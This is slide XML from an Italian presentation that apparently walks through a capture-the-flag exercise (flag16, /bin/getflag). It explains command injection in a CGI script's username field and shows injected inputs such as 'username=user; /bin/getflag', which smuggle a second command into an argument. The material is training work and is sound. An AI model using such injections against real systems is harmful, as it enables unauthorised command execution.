            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Immagine 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46BAFADB-AC40-E763-1680-8FB01524E3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="15749" t="25838" r="7121" b="28877"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095884" y="3275859"/>
            <a:ext cx="7052838" cy="1496291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D08F2ACB-B533-DE66-FC61-1FF457CD2DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690446" y="1694359"/>
            <a:ext cx="7578315" cy="81518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152400" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Questa riga è importante perché grazie ad essa possiamo manipolare ciò che viene memorizzato nella variabile $username permettendo un attacco di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83893C06-B04F-6EE8-43FA-DFC1B1F601F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690446" y="2355614"/>
            <a:ext cx="7578315" cy="75473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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Digitiamo il seguente comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username=user; /bin/getflag password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>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6">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>Un primo tentativo</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113C3EE9-131C-2C30-ECA8-283D8C653A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="1119495"/>
            <a:ext cx="7578315" cy="99752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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Notiamo che il comando</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username=user; /bin/getflag password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>provoca l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5863E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esecuzione sequenziale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>di due comandi da parte dell’interprete BASH:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7944C0-9D17-67CC-B06C-BA5231872DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866227" y="2750719"/>
            <a:ext cx="3338628" cy="20999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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t>Quindi non si tratta di iniezione locale!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2592CD6B-0439-4A96-1575-5FABE18DA1D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690446" y="3107308"/>
            <a:ext cx="7578315" cy="57107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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Per effettuare una iniezione locale dobbiamo digitare invece:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username= «user; /bin/getflag» password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84412A45-BB9B-FBCA-6DF2-B770522FDA28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="7091" b="26698"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="828698" y="3678382"/>
            <a:ext cx="7440063" cy="990286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5708925-9525-BC13-B5CA-D8EDDE5B4186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957254" y="2077495"/>
            <a:ext cx="7578315" cy="33013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r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>con argomento «user» che verrà usato per il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>egrep</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C42409B9-F198-DF7D-6DC9-696D1344481B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957254" y="2349186"/>
            <a:ext cx="7578315" cy="32823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r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/getflag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>il quale viene eseguito ma non con i privilegi di flag16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113694670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6">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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xEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>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
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1849" name="Google Shape;1849;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1196581"/>
            <a:ext cx="4156364" cy="374388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Ma questo era un output prevedibile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1970" name="Google Shape;1970;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4572000" y="496500"/>
            <a:ext cx="3846900" cy="469800"/>
            <a:chOff x="4572000" y="496500"/>
            <a:chExt cx="3846900" cy="469800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1971" name="Google Shape;1971;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="496500"/>
              <a:ext cx="38469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2" name="Google Shape;1972;p62"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7631947" y="671363"/>
              <a:ext cx="636814" cy="120078"/>
              <a:chOff x="8209059" y="198000"/>
              <a:chExt cx="636814" cy="120078"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1973" name="Google Shape;1973;p62"/>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2"/>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2"/>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Immagine 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3252670E-2078-F314-B618-BC9A1C9001F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="364595"/>
            <a:ext cx="4311314" cy="4311314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Immagine 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65360DF5-34FE-0503-12A7-857FD73D6092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3187099" y="417053"/>
